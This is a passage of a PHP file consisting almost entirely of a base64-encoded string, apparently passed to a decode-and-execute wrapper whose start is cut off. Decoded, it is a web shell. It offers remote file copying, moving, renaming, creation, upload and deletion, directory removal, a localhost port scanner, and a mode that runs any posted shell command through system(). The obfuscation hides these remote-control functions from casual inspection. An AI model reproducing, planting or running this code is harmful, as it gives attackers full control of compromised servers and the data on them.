zcmMsICRkc3QpKXsKZWNobyAiRmlsZSBjb3BpZWQgc3VjY2Vzc2Z1bGx5LjxwPlxuIjsKfQplbHNlIHsKZWNobyAiVW5hYmxlIHRvIGNvcHkgIiAuICRzcmMgLiAiLjxwPlxuIjsKfQp9CmJyZWFrOwpjYXNlICdtb3ZlJzoKJHNyYyA9ICRfR0VUIFsnc3JjJ107CiRkc3QgPSAkX1BPU1QgWydkc3QnXTsKaWYgKGVtcHR5ICgkZHN0KSl7CmVjaG8gIjxmb3JtIGFjdGlvbiA9ICciLiRjdXJyZW50IC4gIiZtb2RlPW1vdmUmc3JjPSIgLiAkc3JjIC4gIicgbWV0aG9kID0gJ1BPU1QnPlxuIjsKZWNobyAiRGVzdGluYXRpb246IDxpbnB1dCBuYW1lID0gJ2RzdCc+PGJyPlxuIjsKZWNobyAiPGlucHV0IHR5cGUgPSAnc3VibWl0JyB2YWx1ZSA9ICdNb3ZlJz48L2Zvcm0+XG4iOwp9CmVsc2UgewppZiAocmVuYW1lICgkc3JjLCAkZHN0KSl7CmVjaG8gIkZpbGUgbW92ZWQgc3VjY2Vzc2Z1bGx5LjxwPlxuIjsKfQplbHNlIHsKZWNobyAiVW5hYmxlIHRvIG1vdmUgIiAuICRzcmMgLiAiLjxwPlxuIjsKfQp9CmJyZWFrOwpjYXNlICdyZW5hbWUnOgokb2xkID0gJF9HRVQgWydvbGQnXTsKJG5ldyA9ICRfUE9TVCBbJ25ldyddOwppZiAoZW1wdHkgKCRuZXcpKXsKZWNobyAiPGZvcm0gYWN0aW9uID0gJyIuJGN1cnJlbnQgLiAiJm1vZGU9cmVuYW1lJm9sZD0iIC4gJG9sZCAuICInIG1ldGhvZCA9ICdQT1NUJz5cbiI7CmVjaG8gIk5ldyBuYW1lOiA8aW5wdXQgbmFtZSA9ICduZXcnPjxicj5cbiI7CmVjaG8gIjxpbnB1dCB0eXBlID0gJ3N1Ym1pdCcgdmFsdWUgPSAnUmVuYW1lJz48L2Zvcm0+XG4iOwp9CmVsc2UgewppZiAocmVuYW1lICgkb2xkLCAkbmV3KSl7CmVjaG8gIkZpbGUvRGlyZWN0b3J5IHJlbmFtZWQgc3VjY2Vzc2Z1bGx5LjxwPlxuIjsKfQplbHNlIHsKZWNobyAiVW5hYmxlIHRvIHJlbmFtZSAiIC4gJG9sZCAuICIuPHA+XG4iOwp9Cn0KYnJlYWs7CgpjYXNlICdybWRpcic6CiRybSA9ICRfR0VUIFsncm0nXTsKaWYgKHJtZGlyICgkcm0pKXsKZWNobyAiRGlyZWN0b3J5IHJlbW92ZWQgc3VjY2Vzc2Z1bGx5LjxwPlxuIjsKfQplbHNlIHsKZWNobyAiVW5hYmxlIHRvIHJlbW92ZSAiIC4gJHJtIC4gIi48cD5cbiI7Cn0KYnJlYWs7CmNhc2UgJ3N5c3RlbSc6CiRjbWQgPSAkX1BPU1QgWydjbWQnXTsKaWYgKGVtcHR5ICgkY21kKSl7CmVjaG8gIjxmb3JtIGFjdGlvbiA9ICciLiRjdXJyZW50IC4gIiZtb2RlPXN5c3RlbScgbWV0aG9kID0gJ1BPU1QnPlxuIjsKZWNobyAiU2hlbGwgQ29tbWFuZDogPGlucHV0IG5hbWUgPSAnY21kJz5cbiI7CmVjaG8gIjxpbnB1dCB0eXBlID0gJ3N1Ym1pdCcgdmFsdWUgPSAnUnVuJz48L2Zvcm0+PHA+XG4iOwp9CmVsc2UgewpzeXN0ZW0gKCRjbWQpOwp9CmJyZWFrOwpjYXNlICdjcmVhdGUnOgokbmV3ID0gJF9QT1NUIFsnbmV3J107CmlmIChlbXB0eSAoJG5ldykpewplY2hvICI8Zm9ybSBhY3Rpb24gPSAnIi4kY3VycmVudCAuICImbW9kZT1jcmVhdGUnIG1ldGhvZCA9ICdQT1NUJz5cbiI7CmVjaG8gIjx0cj48dGQ+TmV3IGZpbGU6IDxpbnB1dCBuYW1lID0gJ25ldyc+PC90ZD5cbiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZSA9ICdzdWJtaXQnIHZhbHVlID0gJ0NyZWF0ZSc+PC90ZD48L3RyPjwvZm9ybT5cbjxwPiI7Cn0KZWxzZSB7CmlmICgkZnAgPSBmb3BlbiAoJG5ldywgInciKSl7CmVjaG8gIkZpbGUgY3JlYXRlZCBzdWNjZXNzZnVsbHkuPHA+XG4iOwp9CmVsc2UgewplY2hvICJVbmFibGUgdG8gY3JlYXRlICIuJGZpbGUuIi48cD5cbiI7Cn0KZmNsb3NlICgkZnApOwp9CmJyZWFrOwpjYXNlICd1cGxvYWQnOgokdGVtcCA9ICRfRklMRVNbJ3VwbG9hZF9maWxlJ11bJ3RtcF9uYW1lJ107CiRmaWxlID0gYmFzZW5hbWUoJF9GSUxFU1sndXBsb2FkX2ZpbGUnXVsnbmFtZSddKTsKaWYgKGVtcHR5ICgkZmlsZSkpewplY2hvICI8Zm9ybSBhY3Rpb24gPSAnIi4kY3VycmVudCAuICImbW9kZT11cGxvYWQnIG1ldGhvZCA9ICdQT1NUJyBFTkNUWVBFPSdtdWx0aXBhcnQvZm9ybS1kYXRhJz5cbiI7CmVjaG8gIkxvY2FsIGZpbGU6IDxpbnB1dCB0eXBlID0gJ2ZpbGUnIG5hbWUgPSAndXBsb2FkX2ZpbGUnPlxuIjsKZWNobyAiPGlucHV0IHR5cGUgPSAnc3VibWl0JyB2YWx1ZSA9ICdVcGxvYWQnPlxuIjsKZWNobyAiPC9mb3JtPlxuPHByZT5cblxuPC9wcmU+IjsKfQplbHNlIHsKaWYobW92ZV91cGxvYWRlZF9maWxlKCR0ZW1wLCRmaWxlKSl7CmVjaG8gIkZpbGUgdXBsb2FkZWQgc3VjY2Vzc2Z1bGx5LjxwPlxuIjsKdW5saW5rICgkdGVtcCk7Cn0KZWxzZSB7CmVjaG8gIlVuYWJsZSB0byB1cGxvYWQgIiAuICRmaWxlIC4gIi48cD5cbiI7Cn0KfQpicmVhazsKCmNhc2UgJ3BvcnRfc2Nhbic6CiRwb3J0X3JhbmdlID0gJF9QT1NUIFsncG9ydF9yYW5nZSddOwppZiAoZW1wdHkgKCRwb3J0X3JhbmdlKSl7CmVjaG8gIjx0YWJsZT48Zm9ybSBhY3Rpb24gPSAnIi4kY3VycmVudC4gIiZtb2RlPXBvcnRfc2NhbicgbWV0aG9kID0gJ1BPU1QnPiI7CmVjaG8gIjx0cj48dGQ+PGlucHV0IHR5cGUgPSAndGV4dCcgbmFtZSA9ICdwb3J0X3JhbmdlJz48L3RkPjx0ZD4iOwplY2hvICJFbnRlciBwb3J0IHJhbmdlIHdoZXJlIHlvdSB3YW50IHRvIGRvIHBvcnQgc2NhbiAoZXguOiAwOjY1NTM1KTwvdGQ+PC90cj4iOwplY2hvICI8dHI+PHRkPjxpbnB1dCB0eXBlID0gJ3N1Ym1pdCcgdmFsdWUgPSAnUG9ydCBTY2FuJz48L3RkPjwvdHI+PC9mb3JtPjwvdGFibGU+IjsKfQplbHNlIHsKJHJhbmdlID0gZXhwbG9kZSAoIjoiLCAkcG9ydF9yYW5nZSk7CmlmICgoIWlzX251bWVyaWMgKCRyYW5nZSBbMF0pKSBvciAoIWlzX251bWVyaWMgKCRyYW5nZSBbMV0pKSl7CmVjaG8gIkJhZCBwYXJhbWV0ZXJzLjxicj4iOwp9CmVsc2UgewokaG9zdCA9ICdsb2NhbGhvc3QnOwokZnJvbSA9ICRyYW5nZSBbMF07CiR0byA9ICRyYW5nZSBbMV07CmVjaG8gIk9wZW4gcG9ydHM6PGJyPiI7CndoaWxlICgkZnJvbSA8PSAkdG8pewokdmFyID0gMDsKJGZwID0gZnNvY2tvcGVuICgkaG9zdCwgJGZyb20pIG9yICR2YXIgPSAxOwppZiAoJHZhciA9PSAwKXsKZWNobyAkZnJvbSAuICI8YnI+IjsKfQokZnJvbSsrOwpmY2xvc2UgKCRmcCk7Cn0KfQp9CmJyZWFrOwoKCn0KCmNsZWFyc3RhdGNhY2hlICgpOwoKZWNobyAiPHByZT5cblxuPC9wcmU+IjsKZWNobyAiPHRhYmxlIHdpZHRoID0gMTAwJT5cbiI7CiRmaWxlcyA9IHNjYW5kaXIgKCRkaXIpOwpmb3JlYWNoICgkZmlsZXMgYXMgJGZpbGUpewppZiAoaXNfZmlsZSAoJGZpbGUpKXsKCiRzaXplID0gcm91bmQgKGZpbGVzaXplICgkZmlsZSkgLyAxMDI0LCAyKTsKZWNobyAiPHRyPjx0ZD4iLiRmaWxlLiI8L3RkPiI7CmVjaG8gIjx0ZD4iLiRzaXplLiIgS0I8L3RkPiI7CmVjaG8gIjx0ZD48YSBocmVmID0gIi4kY3VycmVudCAuICImbW9kZT1lZGl0JmZpbGU9Ii4kZmlsZS4iPkVkaXQ8L2E+PC90ZD5cbiI7CmVjaG8gIjx0ZD48YSBocmVmID0gIi4kY3VycmVudCAuICImbW9kZT1kZWxldGUmZmlsZT0iLiRmaWxlLiI+RGVsZXRlPC9hPjwvdGQ+XG4iOwplY2hvICI8dGQ+PGEgaHJlZiA9ICIuJGN1cnJlbnQgLiAiJm1vZGU9Y29weSZzcmM9Ii4kZmlsZS4iPkNvcHk8L2E+PC90ZD5cbiI7CmVjaG8gIjx0ZD48YSBocmVmID0gIi4kY3VycmVudCAuICImbW9kZT1tb3ZlJnNyYz0iLiRmaWxlLiI+TW92ZTwvYT48L3RkPlxuIjsKZWNobyAiPHRkPjxhIGhyZWYgPSAiLiRjdXJyZW50IC4gIiZtb2RlPXJlbmFtZSZvbGQ9Ii4kZmlsZS4iPlJlbWFtZTwvYT48L3RkPjwvdHI+XG4iOwp9CmVsc2UgewokaXRlbXMgPSBzY2FuZGlyICgkZmlsZSk7CiRpdGVtc19udW0gPSBjb3VudCAoJGl0ZW1zKSAtIDI7CmVjaG8gIjx0cj48dGQ+Ii4kZmlsZS4iPC90ZD4iOwplY2hvICI8dGQ+Ii4kaXRlbXNfbnVtLiIgSXRlbXM8L3RkPiI7CmVjaG8gIjx0ZD48YSBocmVmID0gIi4kY3VycmVudCAuICIvIiAuICRmaWxlLiI+Q2hhbmdlIGRpcmVjdG9yeTwvYT48L3RkPlxuIjsKZWNobyAiPHRkPjxhIGhyZWYgPSAiLiRjdXJyZW50IC4gIiZtb2RlPXJtZGlyJnJtPSIuJGZpbGUuIj5SZW1vdmUgZGlyZWN0b3J5PC9hPjwvdGQ+XG4iOwplY2hvICI8dGQ+PGEgaHJlZiA9ICIuJGN1cnJlbnQgLiAiJm1vZGU9cmVuYW1lJm9sZD0iLiRmaWxlLiI+UmVuYW1lIGRpcmVjdG9yeTwvYT48L3RkPjwvdHI+XG4iOwp9Cn0KZWNobyAiPC90YWJsZT5cbiI7Cg=='));
?>